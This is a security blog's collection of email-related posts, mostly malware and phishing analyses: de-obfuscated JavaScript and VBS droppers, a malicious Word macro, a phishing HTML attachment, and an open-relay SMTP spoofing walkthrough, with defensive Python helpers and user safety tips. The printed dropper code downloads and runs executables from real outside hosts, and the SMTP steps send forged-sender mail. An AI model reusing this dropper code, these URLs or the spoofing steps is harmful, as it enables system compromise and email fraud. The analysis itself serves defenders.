Showing posts with label Email. Show all posts

Friday, September 16, 2016

Sending SMTP Emails

This Kali tutorial on SMTP hacking gives a simple walk-through.

If you find a vulnerable SMTP server that does not require authentication (an open relay), you can telnet or netcat to it on port 25.

First greet the server with HELO thedomain.com

Next start a message with the sender MAIL FROM: sendingvictim@thedomain.com

And set the recipient RCPT TO: spamvictim@somewhere.com

And start the body by typing DATA

Enter the subject with SUBJECT: my subject

Then type in the body of the email you want

Then type . and hit <ENTER> to send the email

Then get out of there with QUIT
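As an added example (not from the tutorial above), here is a small Python model of the server side of that exchange: it replays the client commands from the walk-through and shows why the same session is queued by an open relay but refused at RCPT TO by a server that only relays for its own domains or for authenticated senders. The server hostname, reply texts and local-domain list are assumptions.

```python
import re

# Client side of the walk-through above, as a constructed transcript.
SESSION = [
    "HELO thedomain.com",
    "MAIL FROM: sendingvictim@thedomain.com",
    "RCPT TO: spamvictim@somewhere.com",
    "DATA",
    "Subject: my subject",
    "",
    "body of the email",
    ".",
    "QUIT",
]


def smtp_dialog(client_lines, local_domains, open_relay=False, authenticated=False):
    """Toy SMTP server: returns (replies, relayed).

    relayed is True only if the message reached the queue.  A hardened server
    accepts RCPT TO only for its own domains unless the client authenticated;
    an open relay accepts any recipient, which is what makes it a spam source.
    """
    replies, in_data, rcpt_ok, relayed = [], False, False, False
    for line in client_lines:
        if in_data:  # inside DATA: lines are message text, only "." ends it
            if line == ".":
                in_data, relayed = False, True
                replies.append("250 2.0.0 Ok: queued")
            continue
        verb = line.split(" ", 1)[0].upper()
        if verb in ("HELO", "EHLO"):
            replies.append("250 mail.example.test")  # assumed hostname
        elif verb == "MAIL":
            replies.append("250 2.1.0 Ok")
        elif verb == "RCPT":
            m = re.search(r"@([\w.-]+)", line)
            domain = m.group(1).lower() if m else ""
            if open_relay or authenticated or domain in local_domains:
                rcpt_ok = True
                replies.append("250 2.1.5 Ok")
            else:
                replies.append("554 5.7.1 Relay access denied")
        elif verb == "DATA":
            if rcpt_ok:
                in_data = True
                replies.append("354 End data with <CR><LF>.<CR><LF>")
            else:  # no accepted recipient, so the body is never read
                replies.append("554 5.5.1 Error: no valid recipients")
        elif verb == "QUIT":
            replies.append("221 2.0.0 Bye")
        else:
            replies.append("502 5.5.2 Error: command not recognized")
    return replies, relayed
```

With the hardened settings the body lines after the refused DATA are parsed as commands and answered with 502, which is exactly what you see when testing a properly configured relay by hand.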



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, June 7, 2016

Understanding VBA from an Invoice Email

This malicious email contained a Microsoft Word attachment with VBA code in it. Here is a link to the full original macro code.

SUBJECT: RECONFIRM INVOICE
ATTACHMENT: RECONFIRM INVOICE.doc


The code was interesting because it seemed amateurish in terms of its obfuscation. Sure, there were tons of random-looking letters, variable names, etc. But in general this was poorly obfuscated, if at all. Here are a few examples:


Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask

The above variable was used for doing bitwise masking of a string value, yet the attacker literally named it "HighMask" so you know exactly what it's used for.

Public Function Encode64(sString As String) As String

The above function literally performs base64 encoding of a string, so the name Encode64 makes sense and makes life simpler for the security researcher.

Public Sub Wipedir(pppppppppppppppppppppppppp As String)

The above function Wipedir calls the FileSystemObject DeleteFolder method, so again it's clearly deleting the evidence afterwards; the obfuscation here is poor.

So de-obfuscating this was quite simple. One of the easier ways to quickly de-obfuscate VBA code like this is to paste it into a Word document, comment out the malicious lines, replace them with MsgBox statements, and execute the code so it does the work for you. For example:

Comment out this code with a tick

'MkDir (decryptString(Encode64(b)))

And replace it with this code

MsgBox ("MkDir=" + decryptString(Encode64(b)))



Comment out this code with a tick

'ChDrive (vEnd988888527)

And replace it with this code

MsgBox ("ChDrive=" + vEnd988888527)



Comment out this code with a tick

'Open vEnd3491963883 For Binary As vEnd1400215006

And replace it with this code

MsgBox ("OpenFile=" + vEnd3491963883)



Comment out this code with a tick

' OBsGG = Shell(vbHH, 1)

And replace it with this code

MsgBox ("Shell=" + vbHH)



Comment out this code with a tick

'OOO.deletefolder pppppppppppppppppppppppppp

And replace it with this code

MsgBox ("deletefolder=" + pppppppppppppppppppppppppp)



And like magic, you'll get a bunch of message boxes that tell you exactly what this code is trying to do. In this case
1.) Create a new folder C:\ProgramData\Memsys
2.) Navigate to that folder C:\ProgramData\Memsys
3.) Open and Write to a file C:\ProgramData\Memsys\ms.exe
4.) Execute that file from the command prompt C:\ProgramData\Memsys\ms.exe
5.) Delete that folder C:\ProgramData\Memsys


Of course always do this in a sandbox, not connected to the Internet, in case you accidentally execute malicious code that you didn't mean to and infect yourself.
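The comment-and-MsgBox rewrite above can be scripted so you do not have to hunt for each dangerous statement by hand. The Python below is an added example (not the author's tooling): it comments out each MkDir, ChDrive, binary Open, Shell and deletefolder line with a tick and follows it with a MsgBox that reveals the decoded argument, which is the same rewrite shown step by step above. The regexes and the sample macro fragment are constructed for this post.

```python
import re

# One rule per dangerous call: label shown in the MsgBox, and a regex whose
# "arg" group captures the value worth revealing (constructed for this post).
RULES = [
    ("MkDir", re.compile(r"^\s*MkDir\s*\((?P<arg>.+)\)\s*$", re.I)),
    ("ChDrive", re.compile(r"^\s*ChDrive\s*\((?P<arg>.+)\)\s*$", re.I)),
    ("OpenFile", re.compile(r"^\s*Open\s+(?P<arg>\S+)\s+For\s+Binary\s+As\s+\S+\s*$", re.I)),
    ("Shell", re.compile(r"^\s*(?:\w+\s*=\s*)?Shell\s*\((?P<arg>[^,]+?)\s*(?:,\s*\d+)?\)\s*$", re.I)),
    ("deletefolder", re.compile(r"^\s*\w+\.deletefolder\s+(?P<arg>\S+)\s*$", re.I)),
]

# Constructed macro fragment using the same statements as the walkthrough.
SAMPLE_MACRO = """\
MkDir (decryptString(Encode64(b)))
ChDrive (vEnd988888527)
Open vEnd3491963883 For Binary As vEnd1400215006
OBsGG = Shell(vbHH, 1)
OOO.deletefolder pppppppppppppppppppppppppp
x = 1
"""


def instrument_macro(vba_source: str) -> str:
    """Neutralise each matching statement (tick comment) and add a MsgBox that
    shows its decoded argument; every other line is left untouched.  Lines that
    already start with a tick never match a rule, so running this twice is safe."""
    out = []
    for line in vba_source.splitlines():
        for label, rx in RULES:
            m = rx.match(line)
            if m:
                indent = line[: len(line) - len(line.lstrip())]
                out.append(f"{indent}'{line.strip()}")
                out.append(f'{indent}MsgBox ("{label}=" + {m.group("arg").strip()})')
                break
        else:
            out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    print(instrument_macro(SAMPLE_MACRO))
```

The rewritten macro still has to be run inside the isolated sandbox described above, since the decode helpers it calls (decryptString, Encode64) are the sample's own code.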



Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, May 31, 2016

Javascript Attachment executing a Payload

Saw the following malicious email this week. The subject was "Internal Company Information Notice". The body of the email told the user that their IP address had been blocked and they needed to acknowledge the email attachment or get disconnected from their services. The attachment was a zip file that contained a JavaScript file inside. If the user were to extract the zip and execute the JavaScript file, a malicious executable would be downloaded and executed on the workstation. The JavaScript was heavily obfuscated, as you can see from this original JavaScript code. I reviewed and de-obfuscated the JavaScript to get the following. I thought I'd walk through the code to give you an idea of what a lot of these attachments are doing. First, if you look at the link above, the obfuscated code contains tons of variables that are unreadable. As an example, this variable below is obfuscated.

var xDYcEgLL = "061013030014053014007007000013";

When you de-obfuscate it, it turns into a string that says "SaveToFile". As is standard with these malicious actors, they have a de-obfuscate function that simply decodes these ugly variables into readable JavaScript. So you can simply call that method, in this case the function below

function phdODK(BDxzUxp)


And it will decode all the variables and you can quickly get an idea of what the malicious actor is trying to accomplish.

In this case I de-obfuscated the code and came up with this pseudo code of what the attacker is doing.

var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
if (xmlReq["Status"] == 200) {
    var fileStream = new ActiveXObject("ADODB.Stream");
    fileStream["Open"]();
    fileStream["Type"] = 1;
    fileStream["Write"](xmlReq["ResponseBody"]);
    fileStream["Position"] = 0;
    var fileObj = new ActiveXObject("Scripting.FileSystemObject");
    fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
    fileStream["Close"]();
    var cmdPrompt = new ActiveXObject("WScript.Shell");
    cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);
}



I'll go line by line through the javascript.

var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
if (xmlReq["Status"] == 200)



The attacker needs a way to download their malicious payload (for example their ransomware executable). To do so they use the Microsoft ActiveX object for XMLHttpRequests, which means this attack, the way it's currently written, only works if the user opens it on a Windows desktop or something else that supports ActiveX. It then sends a GET request to the malicious URL hosting the executable. The 0 parameter means it's a synchronous call, so the code waits for the download to complete before proceeding. Only if the download is successful (response code = 200) does it proceed to the next steps.

var fileStream = new ActiveXObject("ADODB.Stream");
fileStream["Open"]();
fileStream["Type"] = 1;
fileStream["Write"](xmlReq["ResponseBody"]);
fileStream["Position"] = 0;
var fileObj = new ActiveXObject("Scripting.FileSystemObject");
fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
fileStream["Close"]();

Next the attacker needs a way to interact with the victim's workstation, and in particular with its file system (typically the C drive). So they open another ActiveX object, an ADODB Stream. The stream is switched to binary mode (Type = 1), the executable downloaded from the malicious URL is written into it, and the position is reset to the start (Position = 0) so the whole buffer gets saved. The stream is then saved to the temporary folder located with the GetSpecialFolder method (#2 = temporary folder). The file name is randomly generated by the GetTempName method of the Scripting.FileSystemObject object. Note that GetTempName returns a fresh random name on every call, so a script that does not store the name it saved under will not find the file again when it tries to run it.

var cmdPrompt = new ActiveXObject("WScript.Shell");
cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);

Finally, having connected to a website, downloaded an executable and saved it as a binary file in the victim's temp folder, the attacker uses a WScript.Shell object to execute the new binary from the command line (cmd.exe). Once this happens it's game over for the victim, as the attacker now has code execution. All because a user did not spot a phishing email with a malicious attachment but instead clicked through. Time to re-image this workstation.
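An added Python triage helper (not part of the original post) that looks for the three-stage chain walked through above: an MSXML2.XMLHTTP download, an ADODB.Stream write/save, and a WScript.Shell run. It matches both dotted calls and the bracket-notation obj["method"]() style the de-obfuscated code uses, and pulls out any URL. The sample script and the stage table are constructed from the pseudo code above.

```python
import re

# Constructed from the de-obfuscated pseudo code above (trimmed to the calls that matter).
SAMPLE_JS = r'''
var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
var fileStream = new ActiveXObject("ADODB.Stream");
fileStream["Write"](xmlReq["ResponseBody"]);
fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
var cmdPrompt = new ActiveXObject("WScript.Shell");
cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);
'''

# Stage name, the ActiveX ProgID that implements it (lowercased), and the
# methods whose presence completes that stage.
STAGES = [
    ("download", "msxml2.xmlhttp", ("open", "send")),
    ("write", "adodb.stream", ("write", "savetofile")),
    ("execute", "wscript.shell", ("run", "exec")),
]


def _calls(name):
    # Matches obj.name( ... ) as well as the obj["name"]( ... ) form used by obfuscators.
    return re.compile(r'(?:\.%s|\[\s*["\']%s["\']\s*\])\s*\(' % (name, name), re.I)


def analyze_dropper(script: str) -> dict:
    """Report which stages of the download-and-execute chain the script contains."""
    progids = {p.lower() for p in re.findall(r'ActiveXObject\(\s*["\']([\w.]+)["\']', script, re.I)}
    stages = [s for s, progid, methods in STAGES
              if progid in progids and any(_calls(m).search(script) for m in methods)]
    urls = re.findall(r'https?://[^\s"\']+', script)
    full_chain = stages == [s for s, _, _ in STAGES]
    return {"stages": stages, "urls": urls,
            "verdict": "download-and-execute dropper" if full_chain else "incomplete chain"}


if __name__ == "__main__":
    print(analyze_dropper(SAMPLE_JS))
```

Run it over the already de-obfuscated script; the variable-name encoding discussed above has to be undone first, since the ProgIDs and method names are what it keys on.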



Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Saturday, November 14, 2015

Malicious VBS Script Walkthrough

This malicious VBS script was attached to a suspicious email. Below I'll walk-through line by line and explain what it's doing.
This is the original code.


data="895C241833C333442334424403344244......4444494e475858504144"
data=split(data,"H")(1)
set ws = CreateObject("WScript.Shell")
fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe"
saveFile fn,data
ws.Run fn
wscript.sleep 100

sub saveFile(fName,str)
  dim temp
  set xmldoc = CreateObject("Microsoft.XMLDOM")
  xmldoc.loadXml ""
  set pic = xmldoc.createElement("pic")
  pic.dataType = "bin.hex"
  pic.nodeTypedValue = str
  temp = pic.nodeTypedValue
  with CreateObject("ADODB.Stream")
    .type = 1
    .open
    .write temp
    .saveToFile fName, 2
    .close:
  end with
end sub


Let's do a line-by-line walk-through of the code above. First...

data="895C241833C333442334424403344244......4444494e475858504144"


There was a large variable that contains a string version of the EXE or malicious payload that the attacker wants to run on your computer.

data=split(data,"H")(1)


But actually the big string variable contains extra junk as well, and only part of it is the malicious executable. The letter "H" marks boundaries in the long string, so the script splits on it and grabs the second part (index 1).

set ws = CreateObject("WScript.Shell")


Then it creates an ActiveX object that allows the attacker to interact with the shell (the command prompt).

fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe"


The first thing they do with the shell object is use it to find the Windows temp folder path, because no matter which user the script runs as, they are more than likely going to have write access to the temp directory. Then with that folder path they build a string holding the final destination where their malicious executable, which they call 'tmp.exe', is going to be saved and run from.

saveFile fn,data


Then they save the executable stored in that string variable to that temp folder path they just found. NOTE: saveFile is not a system function, it is a custom written one that we will talk about more below.

ws.Run fn
wscript.sleep 100


Then they use the shell object to run the executable they just saved. And they have the script sleep/pause a little bit just to ensure their executable finishes running. NOTE: We didn't discuss today what the executable was doing but let's assume it's installing some sort of backdoor that allows the attacker to control your computer and send/receive data from it at a later date.

Now, as we stated above, there was one custom function called saveFile that we need to dig a bit deeper into.

sub saveFile(fName,str)


The function is called saveFile and it takes 2 parameters, the path to save to (called 'fName') and the data to save to the file (called 'str').

  dim temp
  set xmldoc = CreateObject("Microsoft.XMLDOM")
  xmldoc.loadXml ""


First some variables are created. A 'temp' variable will hold the final binary version of the executable string passed into this function, which is what gets written to disk. The xmldoc is used as part of the transformation from that string into binary; it is an ActiveX XMLDOM object (which allows reading, writing and modifying XML documents). Initially the attacker just loads an empty XML document (with just the version header) into it.

  set pic = xmldoc.createElement("pic")
  pic.dataType = "bin.hex"
  pic.nodeTypedValue = str
  temp = pic.nodeTypedValue


Now the attacker uses that empty XML document simply as a pass-through to transform his string into binary. How? He creates one new element called 'pic' inside the empty xmldoc. He sets the data type of 'pic' to 'bin.hex' (hex-encoded binary, which is what an executable needs). Then he assigns the string version of the executable (passed in as 'str') to the XML element. Now when he reads the 'nodeTypedValue' property back, that's where the magic happens: the XMLDOM object automatically converts his hex string into raw bytes. He puts that binary value into the 'temp' variable. Almost done.

  with CreateObject("ADODB.Stream")
    .type = 1
    .open
    .write temp
    .saveToFile fName, 2
    .close:
  end with
end sub


The final step for the attacker is to create an ActiveX ADODB.Stream object, which allows manipulation of a binary stream of data (which he now has in 'temp'). He uses a With block, so each line starting with a dot (.) calls a member of that object. First he sets the type of data (1 = binary, 2 = text). Then he opens the stream in memory. Then he writes the bytes from 'temp' to the stream. Then he saves the stream from memory to disk at the location specified in 'fName', passing the save option (1 = don't overwrite if exists, 2 = overwrite if exists). Then he closes the stream and we're done. Let the evilness begin.
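Added example (not the author's code): a Python reimplementation of the split-and-decode path of saveFile that carves the embedded executable out of the data string without ever writing or running it, so an analyst can hash it or check for the MZ header from the script alone. The data value is a constructed stand-in, since the post's real payload string is not reproduced here.

```python
import hashlib

# Constructed stand-in for the script's "data" variable: junk hex, the "H"
# separator, a 16-byte fake MZ stub in hex, then more junk.  "H" is a safe
# delimiter for the attacker because it is never a hex digit.
DATA = "6a756e6b" + "H" + "4d5a9000030000000400000000ffff00" + "H" + "74726169"

HEX_DIGITS = set("0123456789abcdefABCDEF")


def carve_payload(data: str, separator: str = "H", index: int = 1) -> bytes:
    """Mirror data=split(data,"H")(1) and the bin.hex conversion done through
    the XMLDOM element, returning raw bytes instead of saving them to disk."""
    parts = data.split(separator)
    if index >= len(parts):
        raise ValueError("separator/index do not select a chunk")
    chunk = parts[index].strip()
    # bin.hex consumes pairs of hex digits, so anything else is not a payload.
    if len(chunk) % 2 or not all(c in HEX_DIGITS for c in chunk):
        raise ValueError("chunk is not even-length hex")
    return bytes.fromhex(chunk)


def describe(payload: bytes) -> dict:
    """Static facts about the carved blob; nothing is written or executed."""
    return {
        "size": len(payload),
        "is_pe": payload[:2] == b"MZ",  # DOS header magic of a Windows executable
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


if __name__ == "__main__":
    print(describe(carve_payload(DATA)))
```

On a real sample the sha256 is what you would pin in an incident ticket or feed to a sandbox, without ever letting the VBS touch disk.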

Hope this was helpful.
NOTE: I didn't include the entire data variable's payload, it was long and not necessary for my walk-through.
NOTE2: I re-orged the code below from the original pastebin dump just to make it more readable.
NOTE3: The original script had a bunch of colons (:) which allows VBS scripts to write multiple commands on the same line. I removed them just to make it more readable again.






Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, March 31, 2015

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk-through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email, and containing talk about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com

Subject: hello
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello


As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar">

The above code should tip you off as bad, because this line of code says that if you open the html file in a browser, it will not display the contents, but instead automatically redirect you to this '.jar' file which will prompt for downloading. '.jar' files are dangerous. Think of them as executable zip files. They'll probably kick off a storm of activity on your pc that will ultimately end up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span>

Otherwise, if you open it just in your email client, you will be shown a pretty looking page, and the code above shows that part of that page will contain a button that if you click on it, it'll load the same malicious jar file.
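To triage an HTML attachment like this one without opening it in a browser or mail client, here is an added Python scanner (not from the original post) that pulls out meta-refresh targets and link hrefs and flags any that point at a risky file type such as the '.jar' above. The sample HTML is constructed from the two quoted lines; the extension list is an assumption.

```python
from html.parser import HTMLParser
import re

# Extensions that should never be the target of an attachment's redirect or link.
RISKY_EXT = (".jar", ".exe", ".js", ".vbs", ".scr", ".hta")

# Constructed from the two lines of Remitance004.html quoted above.
SAMPLE_HTML = """
<html><head>
<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar">
</head><body>
<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span>
</body></html>
"""


class AttachmentScanner(HTMLParser):
    """Collects meta-refresh targets and anchor hrefs.  HTMLParser lowercases
    tag and attribute names, so <META HTTP-EQUIV=...> is handled as well."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, url)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "9;url=http://..." : the delay, then the target
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "a" and a.get("href"):
            self.findings.append(("link", a["href"]))


def scan_html_attachment(html: str) -> dict:
    """Return every redirect/link found, the risky ones, and whether the page
    redirects on its own (a meta refresh) without any click."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    risky = [(k, u) for k, u in scanner.findings
             if u.lower().split("?", 1)[0].split("#", 1)[0].endswith(RISKY_EXT)]
    return {
        "auto_redirect": any(k == "meta-refresh" for k, _ in scanner.findings),
        "risky": risky,
        "findings": scanner.findings,
    }


if __name__ == "__main__":
    print(scan_html_attachment(SAMPLE_HTML))
```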

Don't open emails from people you don't know, especially if it's got an attachment.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, November 17, 2014

Phishing Samples November 2014

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.

I dumped some recent samples onto pastebin

You'll see plays on topics like
- target credit card breach
- Facebook
- linked in
- Medicare
- Job postings
- credit reports
- your bank
- UPS shipments
- FedEx shipments
- so many more....


Protecting yourself is simpler than you think. Here are some simple steps I recommend ...
- If you were not expecting the email be extra cautious
- even if you were expecting an email still check the basics below
- hover over the email or click reply and verify the sender is a legit address
- hover over or copy and paste links and verify they are legit
- better yet resist clicking on any link at all, instead manually type the URL you want and go to the site on your own terms
- don't open attachments; legit websites won't send them. If you are waiting on something, manually go to the website, log in, and check there

Also keep in mind the same topics are starting to apply to text messages too. Don't click on links.

What's the worst that could happen? Think ...
- virus on your PC
- virus on your phone
- identity theft
- stolen password
- stolen credit card
- bad bad things ...

Stay safe out there !

Copyright © 2014, this post cannot be reproduced or retransmitted in any form without reference to the original post.